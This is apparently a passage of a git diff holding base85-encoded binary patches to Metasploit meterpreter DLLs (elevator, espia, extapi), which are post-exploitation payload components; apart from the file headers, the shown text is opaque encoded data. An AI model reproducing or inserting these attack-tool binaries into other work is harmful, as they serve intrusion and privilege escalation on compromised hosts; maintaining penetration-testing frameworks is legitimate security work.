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 TTHKuZGfaF{Gk<r|a8LR_9`g^* diff --git a/data/meterpreter/elevator.x64.dll b/data/meterpreter/elevator.x64.dll index 51a59e0838774e3993437d7a2cfa696922349605..fc4b66cef35d657e2b5063056c40c213b0d63fff 100755 GIT binary patch delta 37 rcmZoT!rE|zb;1W`p8FFfe)eVBQPb?ixZR17@sK`9Xgj+h<4*$sFTW1q delta 37 rcmZoT!rE|zb;1Yc`Tsg5e)eTLx4YSiak~>E;~{;J&~|o1#-9cNPVEqi diff --git a/data/meterpreter/elevator.x86.dll b/data/meterpreter/elevator.x86.dll index f8c755ae3147a32abd839c62f4f6bcb3a79d27ee..0c672fe4b50697e6d1522e060857472908cbc72c 100755 GIT binary patch delta 37 rcmZp8!qV`BWx@~UDfcE!{O!wh{!g<P<907bMlTMK(Dvz^jF}n$Q}+-R delta 37 rcmZp8!qV`BWx@~Uz<(VRfBQ07*))4GZueqj^x^;sZJ*A`n5h8(GG`8I diff --git a/data/meterpreter/ext_server_espia.x64.dll b/data/meterpreter/ext_server_espia.x64.dll index 2595bdaa8ff732a546c1d5196106404fe5a34f59..a48fa5dcd33ad8bb7d6dd17f437dc4113e961af7 100755 GIT binary patch delta 41 vcmZqJ!PBsVXTk?&&HEE3e)eT*nAYsX*zUy0xZR17$>}^uczgQ=rb=%BY2gr> delta 41 vcmZqJ!PBsVXTk^O_5V61e)eUmx!UZ+*zUy0xZR17$>}^uczgQ=rb=%Bh-?xM diff --git a/data/meterpreter/ext_server_espia.x86.dll b/data/meterpreter/ext_server_espia.x86.dll index 939cbb2e0fcfb0691af9f5382e2e5b1f12ce3592..e98f80697db2cca09f804bff11f3b8147da23d9e 100755 GIT binary patch delta 42 wcmZqJ!qc#YX8|MghI<nxGc)=!i7ampVr&m$WZWLa$W-(gB)<Ll6DCVj081zj=>Px# delta 42 ycmZqJ!qc#YX8|K~(!Y+$%#6NF>Cc*j7~6vw8Mg;9G8H{$PW;!g{rD3mOH%+)CJ+t) diff --git a/data/meterpreter/ext_server_extapi.x64.dll b/data/meterpreter/ext_server_extapi.x64.dll index 01831d3576e464f2350beda1d01f3b77f0f17cf7..d47966210c972f725836f5dbe773e52f2e94583d 100755 GIT binary patch delta 20230 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 